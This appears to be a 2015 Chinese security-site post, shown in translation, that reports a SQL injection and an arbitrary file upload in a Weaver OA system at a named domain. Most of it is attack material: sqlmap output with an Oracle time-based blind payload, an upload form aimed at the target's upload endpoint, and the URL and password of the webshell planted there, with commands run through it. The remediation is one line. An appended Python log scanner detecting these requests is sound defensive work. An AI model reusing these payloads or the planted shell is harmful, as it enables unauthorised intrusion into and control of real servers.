A certain Mofang (魔方) system has SQL injection and can be used to getshell - 华盟网 - http://www.77169.org

[Image gallery] A certain Mofang (魔方) system has SQL injection and can be used to getshell

2015/9/16 Author: getshell Source: collected from the web

  A Weaver (泛微) OA system:

  http://oa.52mf.cn


  Injection point: http://oa.52mf.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:51:27] [INFO] resuming back-end DBMS 'oracle'
[10:51:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://oa.52mf.cn:80/homepage/LoginHomepage.jsp?hpid=52 AND 6364=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(90)||CHR(106)||CHR(82),5)&isfromportal=1
---
available databases [1]:
[*] ECOLOGY

  The arbitrary file upload can be used to getshell.

  Construct the upload form:

<form method="post" action="http://oa.52mf.cn/tools/SWFUpload/upload.jsp" enctype="multipart/form-data">
<input type="file" id="file" name="test" style="height:20px;border:#8F908B 1px solid;"/>
<button type="submit" value="getshell">getshell</button>
</form>

  Visit http://oa.52mf.cn/nullacc.jsp, password 023

  Execute commands:

  http://oa.52mf.cn/nullacc.jsp?pwd=023&cmd=ipconfig


  net user


  whoami


  Solution:

  Filter (sanitize) user input.
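As an added detection example (not part of the original write-up), the following Python scans web-server access logs for the three request patterns this report shows: an Oracle time-based blind payload (DBMS_PIPE.RECEIVE_MESSAGE with CHR()||CHR() string building), a POST to the SWFUpload endpoint, and a .jsp request carrying both pwd and cmd parameters. The log lines are constructed samples in Apache combined format; the endpoint paths are taken from the report above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Sep/2015:10:51:27 +0800] "GET /homepage/LoginHomepage.jsp?hpid=52%20AND%206364%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2871%29%7C%7CCHR%2890%29%2C5%29&isfromportal=1 HTTP/1.1" 200 4213 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [16/Sep/2015:10:53:02 +0800] "POST /tools/SWFUpload/upload.jsp HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Sep/2015:10:54:10 +0800] "GET /nullacc.jsp?pwd=023&cmd=whoami HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Sep/2015:11:00:00 +0800] "GET /homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
# Oracle time-based blind primitive used in the sqlmap payload above.
ORACLE_TIME_BLIND = re.compile(r'DBMS_PIPE\.RECEIVE_MESSAGE\s*\(', re.I)
# CHR(n)||CHR(n) concatenation: builds strings without quote characters.
CHR_CONCAT = re.compile(r'CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)', re.I)


def classify(line):
    """Return a list of finding tags for one log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m['path'])
    decoded = unquote_plus(url.query)      # decode before matching so %28/%7C do not hide the payload
    params = parse_qs(url.query)
    findings = []
    if ORACLE_TIME_BLIND.search(decoded) or CHR_CONCAT.search(decoded):
        findings.append('oracle_time_blind_sqli')
    if m['method'] == 'POST' and url.path.lower().endswith('/swfupload/upload.jsp'):
        findings.append('upload_endpoint_post')
    if url.path.lower().endswith('.jsp') and {'pwd', 'cmd'} <= set(params):
        findings.append('webshell_command')
    return findings


def scan(log_text):
    """Return (ip, path, tags) for every line that produced at least one finding."""
    results = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            results.append((LOG_RE.match(line)['ip'], urlsplit(LOG_RE.match(line)['path']).path, tags))
    return results


if __name__ == '__main__':
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ', '.join(tags))
```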


